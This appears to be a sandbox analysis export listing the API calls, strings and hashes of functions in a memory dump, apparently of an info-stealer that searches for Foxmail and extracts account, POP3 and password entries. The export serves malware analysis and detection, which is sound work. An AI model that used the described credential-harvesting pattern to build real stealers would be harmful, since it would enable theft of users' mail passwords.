• Opcode ID: 34802c38cf07b8d8df4de3bac5bde5d0158c56b6d0073d13bd313e40a7efd439
• Instruction ID: 15937c7fe72834f2101b4151d55ec36274c4c563a48cc193c8c45657e12d988f
• Opcode Fuzzy Hash: 34802c38cf07b8d8df4de3bac5bde5d0158c56b6d0073d13bd313e40a7efd439
• Instruction Fuzzy Hash: 6721E3729443496BDB18EAA4DC48F9B7BACEF89314F000D2AFA98D30D0E734D6058796

Control-flow Graph

APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 21BD1434
  • Part of subcall function 21BD10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 21BD1137
  • Part of subcall function 21BD10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21BD1151
  • Part of subcall function 21BD10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21BD115C
  • Part of subcall function 21BD10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21BD116D
  • Part of subcall function 21BD10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 21BD117C
  • Part of subcall function 21BD10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21BD1193
  • Part of subcall function 21BD10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 21BD11D0
  • Part of subcall function 21BD10F1: FindClose.KERNEL32(00000000), ref: 21BD11DB
• lstrlenW.KERNEL32(?), ref: 21BD14C5
• lstrlenW.KERNEL32(?), ref: 21BD14E0
• lstrlenW.KERNEL32(?,?), ref: 21BD150F
• lstrcatW.KERNEL32(00000000), ref: 21BD1521
• lstrlenW.KERNEL32(?,?), ref: 21BD1547
• lstrcatW.KERNEL32(00000000), ref: 21BD1553
• lstrlenW.KERNEL32(?,?), ref: 21BD1579
• lstrcatW.KERNEL32(00000000), ref: 21BD1585
• lstrlenW.KERNEL32(?,?), ref: 21BD15AB
• lstrcatW.KERNEL32(00000000), ref: 21BD15B7
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: 460794e71e872a7b87083a45fecd11cc653fe9e322abdcf4edfc04deda624c4a
• Instruction ID: 95aa7f437a434e503b6c9e3b2735645973f7eb294f2b777900bd636055e40a45
• Opcode Fuzzy Hash: 460794e71e872a7b87083a45fecd11cc653fe9e322abdcf4edfc04deda624c4a
• Instruction Fuzzy Hash: A081B272A40359A9DF28DBA1DC85FEF737DEF88700F100596F508E7190EA715A84CB95
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 21BD61DA
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 21BD61E4
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 21BD61F1
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: eea2305f6f139ef7119eb8e714563213b1d74ecd8f97e6754e483cb13bbe9586
• Instruction ID: d49c84796d570ddefddc478421ce519e787615d4e5855ea0e9ab4e0ac9dc51d0
• Opcode Fuzzy Hash: eea2305f6f139ef7119eb8e714563213b1d74ecd8f97e6754e483cb13bbe9586
• Instruction Fuzzy Hash: C431D375D4121D9BCB29DF64D98878DBBB8EF08310F5041EAE81CA7260E7349F818F45
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,21BD4A8A,?,21BE2238,0000000C,21BD4BBD,00000000,00000000,00000001,21BD2082,21BE2108,0000000C,21BD1F3A,?), ref: 21BD4AD5
                                                                                                    • TerminateProcess.KERNEL32(00000000,?,21BD4A8A,?,21BE2238,0000000C,21BD4BBD,00000000,00000000,00000001,21BD2082,21BE2108,0000000C,21BD1F3A,?), ref: 21BD4ADC
                                                                                                    • ExitProcess.KERNEL32 ref: 21BD4AEE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                    • String ID:
                                                                                                    • API String ID: 1703294689-0
                                                                                                    • Opcode ID: 34e366fb6ff04c95dd2b757efff0b5eb9e0f1c645aa701587005ee713c093389
                                                                                                    • Instruction ID: a4b0af82eb70d4cd007feac4939e9010317d203eaeabd1dd49e7362dabe565c9
                                                                                                    • Opcode Fuzzy Hash: 34e366fb6ff04c95dd2b757efff0b5eb9e0f1c645aa701587005ee713c093389
                                                                                                    • Instruction Fuzzy Hash: D6E0B636140609AFCF0EAF64CE68A493F79EF9A381F504024FA458B561DB3AD942CB94
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: .
                                                                                                    • API String ID: 0-248832578
                                                                                                    • Opcode ID: a33828406dc501190a7d55dd33ecfe5232e9f9722bde796e211d959b17ae29f1
                                                                                                    • Instruction ID: a593705268c7d89c7971ca5254d15a59d2b83a416435621e5edfc92fc4cc9310
                                                                                                    • Opcode Fuzzy Hash: a33828406dc501190a7d55dd33ecfe5232e9f9722bde796e211d959b17ae29f1
                                                                                                    • Instruction Fuzzy Hash: 9E31E572900149AFDB1DCE78CC84EEA7BBDDF86314F4001ADF919D72A5E6319E458B90
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HeapProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 54951025-0
                                                                                                    • Opcode ID: 79e3f3b4b96b1b1dd763280e6d54bae6665f53ae31230d37861ebf3ae4270157
                                                                                                    • Instruction ID: 709d3f7f63ee8cbc56bdbace31c86893f97385386cfe72975bd41ce177132d1c
                                                                                                    • Opcode Fuzzy Hash: 79e3f3b4b96b1b1dd763280e6d54bae6665f53ae31230d37861ebf3ae4270157
                                                                                                    • Instruction Fuzzy Hash: E4A011302822028F83088F30823A20E3ABCAE8A2C0B0000A8E888C20A0EB2880008B00

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 21BD1CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D1B
                                                                                                      • Part of subcall function 21BD1CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21BD1D37
                                                                                                      • Part of subcall function 21BD1CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D4B
                                                                                                    • _strlen.LIBCMT ref: 21BD1855
                                                                                                    • _strlen.LIBCMT ref: 21BD1869
                                                                                                    • _strlen.LIBCMT ref: 21BD188B
                                                                                                    • _strlen.LIBCMT ref: 21BD18AE
                                                                                                    • _strlen.LIBCMT ref: 21BD18C8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen$File$CopyCreateDelete
                                                                                                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                    • API String ID: 3296212668-3023110444
                                                                                                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                    • Instruction ID: 8371833405e30cf2a14f86c75d26d6ab52569deaa7f6a785640143f5aec130bd
                                                                                                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                    • Instruction Fuzzy Hash: D861E473D00219AFEF1DCBA4C840BDEBBB9AF5E300F40419AD204A7250DB795A46CF56

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen
                                                                                                    • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                    • API String ID: 4218353326-230879103
                                                                                                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                    • Instruction ID: 36be6d3c675ca4366c0ab0d1be713f3e6df534c7f401e3143b01cdfbbe463833
                                                                                                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                    • Instruction Fuzzy Hash: 9271D472D0026A5FDF1DDBA49894ADE7BFC9B1D300F14409AE644E7241EA749B85CBA0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • ___free_lconv_mon.LIBCMT ref: 21BD7D06
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD90D7
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD90E9
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD90FB
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD910D
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD911F
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD9131
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD9143
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD9155
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD9167
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD9179
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD918B
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD919D
                                                                                                      • Part of subcall function 21BD90BA: _free.LIBCMT ref: 21BD91AF
                                                                                                    • _free.LIBCMT ref: 21BD7CFB
                                                                                                      • Part of subcall function 21BD571E: HeapFree.KERNEL32(00000000,00000000,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?), ref: 21BD5734
                                                                                                      • Part of subcall function 21BD571E: GetLastError.KERNEL32(?,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?,?), ref: 21BD5746
                                                                                                    • _free.LIBCMT ref: 21BD7D1D
                                                                                                    • _free.LIBCMT ref: 21BD7D32
                                                                                                    • _free.LIBCMT ref: 21BD7D3D
                                                                                                    • _free.LIBCMT ref: 21BD7D5F
                                                                                                    • _free.LIBCMT ref: 21BD7D72
                                                                                                    • _free.LIBCMT ref: 21BD7D80
                                                                                                    • _free.LIBCMT ref: 21BD7D8B
                                                                                                    • _free.LIBCMT ref: 21BD7DC3
                                                                                                    • _free.LIBCMT ref: 21BD7DCA
                                                                                                    • _free.LIBCMT ref: 21BD7DE7
                                                                                                    • _free.LIBCMT ref: 21BD7DFF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                    • String ID:
                                                                                                    • API String ID: 161543041-0
                                                                                                    • Opcode ID: 593656c921360c357da55ca7fb46f8674c8c8c323e8bd6c847f7682c0fbb7ba0
                                                                                                    • Instruction ID: e6b83eaecef39d46d3678604031e8c4ea40ab63c9f40b17c8c8c92d6d38214d7
                                                                                                    • Opcode Fuzzy Hash: 593656c921360c357da55ca7fb46f8674c8c8c323e8bd6c847f7682c0fbb7ba0
                                                                                                    • Instruction Fuzzy Hash: D1311B73600206EFEB2DDE39D944FA67BF9EF05318F215469E849D7561DA31A980CB10

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 21BD59EA
                                                                                                      • Part of subcall function 21BD571E: HeapFree.KERNEL32(00000000,00000000,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?), ref: 21BD5734
                                                                                                      • Part of subcall function 21BD571E: GetLastError.KERNEL32(?,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?,?), ref: 21BD5746
                                                                                                    • _free.LIBCMT ref: 21BD59F6
                                                                                                    • _free.LIBCMT ref: 21BD5A01
                                                                                                    • _free.LIBCMT ref: 21BD5A0C
                                                                                                    • _free.LIBCMT ref: 21BD5A17
                                                                                                    • _free.LIBCMT ref: 21BD5A22
                                                                                                    • _free.LIBCMT ref: 21BD5A2D
                                                                                                    • _free.LIBCMT ref: 21BD5A38
                                                                                                    • _free.LIBCMT ref: 21BD5A43
                                                                                                    • _free.LIBCMT ref: 21BD5A51
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: 7139f46063e01d959fc147f300758dde3116fc2f5f432f94035b9cd1025b277d
                                                                                                    • Instruction ID: 1296b72e613e69d492e23fdc1274de2075df3b322cc2f22cfc7385a9b155f7d1
                                                                                                    • Opcode Fuzzy Hash: 7139f46063e01d959fc147f300758dde3116fc2f5f432f94035b9cd1025b277d
                                                                                                    • Instruction Fuzzy Hash: 9711727A520149EFCF19DF94C841CDD3FB9EF18350F6691A5BA088B225DA32EA509B80

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D1B
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21BD1D37
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D4B
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D58
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D72
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D7D
                                                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21BD1D8A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1454806937-0
                                                                                                    • Opcode ID: b06fa12c90339af2981aded4371347dad3424f323e9ab5ca8a97a640158e899f
                                                                                                    • Instruction ID: f4b7979c2ebf257615af698173dd22a4a8ed89f0b49859a40c5d3867a001da4f
                                                                                                    • Opcode Fuzzy Hash: b06fa12c90339af2981aded4371347dad3424f323e9ab5ca8a97a640158e899f
                                                                                                    • Instruction Fuzzy Hash: 63214CB298121CAFEB19DBA08C9CEEA7ABCEF5D384F0005A5F555D3180D7749E458B70

                                                                                                    Control-flow Graph

APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,21BD9C07,?,00000000,?,00000000,00000000), ref: 21BD94D4
• __fassign.LIBCMT ref: 21BD954F
• __fassign.LIBCMT ref: 21BD956A
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 21BD9590
• WriteFile.KERNEL32(?,?,00000000,21BD9C07,00000000,?,?,?,?,?,?,?,?,?,21BD9C07,?), ref: 21BD95AF
• WriteFile.KERNEL32(?,?,00000001,21BD9C07,00000000,?,?,?,?,?,?,?,?,?,21BD9C07,?), ref: 21BD95E8
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0

Control-flow Graph

APIs
• _ValidateLocalCookies.LIBCMT ref: 21BD339B
• ___except_validate_context_record.LIBVCRUNTIME ref: 21BD33A3
• _ValidateLocalCookies.LIBCMT ref: 21BD3431
• __IsNonwritableInCurrentImage.LIBCMT ref: 21BD345C
• _ValidateLocalCookies.LIBCMT ref: 21BD34B1
Strings
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373

Control-flow Graph

APIs
  • Part of subcall function 21BD9221: _free.LIBCMT ref: 21BD924A
• _free.LIBCMT ref: 21BD92AB
  • Part of subcall function 21BD571E: HeapFree.KERNEL32(00000000,00000000,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?), ref: 21BD5734
  • Part of subcall function 21BD571E: GetLastError.KERNEL32(?,?,21BD924F,?,00000000,?,00000000,?,21BD9276,?,00000007,?,?,21BD7E5A,?,?), ref: 21BD5746
• _free.LIBCMT ref: 21BD92B6
• _free.LIBCMT ref: 21BD92C1
• _free.LIBCMT ref: 21BD9315
• _free.LIBCMT ref: 21BD9320
• _free.LIBCMT ref: 21BD932B
• _free.LIBCMT ref: 21BD9336
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0

Control-flow Graph

APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,21BD6FFD,00000000,?,?,?,21BD8A72,?,?,00000100), ref: 21BD887B
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,21BD8A72,?,?,00000100,5EFC4D8B,?,?), ref: 21BD8901
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 21BD89FB
• __freea.LIBCMT ref: 21BD8A08
  • Part of subcall function 21BD56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21BD5702
• __freea.LIBCMT ref: 21BD8A11
• __freea.LIBCMT ref: 21BD8A36
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0

Control-flow Graph

APIs
• _strlen.LIBCMT ref: 21BD1607
• _strcat.LIBCMT ref: 21BD161D
• lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,21BD190E,?,?,00000000,?,00000000), ref: 21BD1643
• lstrcatW.KERNEL32(?,?,?,?,?,?,21BD190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 21BD165A
• lstrlenW.KERNEL32(?,?,?,?,?,21BD190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 21BD1661
• lstrcatW.KERNEL32(00001008,?,?,?,?,?,21BD190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 21BD1686
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: lstrcatlstrlen$_strcat_strlen
• String ID:
• API String ID: 1922816806-0

Control-flow Graph

APIs
• lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 21BD1038
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21BD104B
• lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21BD1061
• lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 21BD1075
• GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 21BD1090
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 21BD10B8
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: lstrlen$AttributesFilelstrcat
• String ID:
• API String ID: 3594823470-0

Control-flow Graph

APIs
• GetLastError.KERNEL32(?,?,21BD3518,21BD23F1,21BD1F17), ref: 21BD3864
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 21BD3872
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 21BD388B
• SetLastError.KERNEL32(00000000,?,21BD3518,21BD23F1,21BD1F17), ref: 21BD38DD
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
APIs
• GetLastError.KERNEL32(?,?,21BD6C6C), ref: 21BD5AFA
• _free.LIBCMT ref: 21BD5B2D
• _free.LIBCMT ref: 21BD5B55
• SetLastError.KERNEL32(00000000,?,?,21BD6C6C), ref: 21BD5B62
• SetLastError.KERNEL32(00000000,?,?,21BD6C6C), ref: 21BD5B6E
• _abort.LIBCMT ref: 21BD5B74
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: ErrorLast$_free$_abort
• String ID:
• API String ID: 3160817290-0
APIs
  • Part of subcall function 21BD1E89: lstrlenW.KERNEL32(?,?,?,?,?,21BD10DF,?,?,?,00000000), ref: 21BD1E9A
  • Part of subcall function 21BD1E89: lstrcatW.KERNEL32(?,?,?,21BD10DF,?,?,?,00000000), ref: 21BD1EAC
  • Part of subcall function 21BD1E89: lstrlenW.KERNEL32(?,?,21BD10DF,?,?,?,00000000), ref: 21BD1EB3
  • Part of subcall function 21BD1E89: lstrlenW.KERNEL32(?,?,21BD10DF,?,?,?,00000000), ref: 21BD1EC8
  • Part of subcall function 21BD1E89: lstrcatW.KERNEL32(?,21BD10DF,?,21BD10DF,?,?,?,00000000), ref: 21BD1ED3
• GetFileAttributesW.KERNEL32(?,?,?,?), ref: 21BD122A
  • Part of subcall function 21BD173A: _strlen.LIBCMT ref: 21BD1855
  • Part of subcall function 21BD173A: _strlen.LIBCMT ref: 21BD1869
Strings
Memory Dump Source
• Source File: 00000009.00000002.4597408288.0000000021BD1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21BD0000, based on PE: true
• Associated: 00000009.00000002.4597385553.0000000021BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.4597408288.0000000021BE6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_21bd0000_msiexec.jbxd
Similarity
• API ID: lstrlen$_strlenlstrcat$AttributesFile
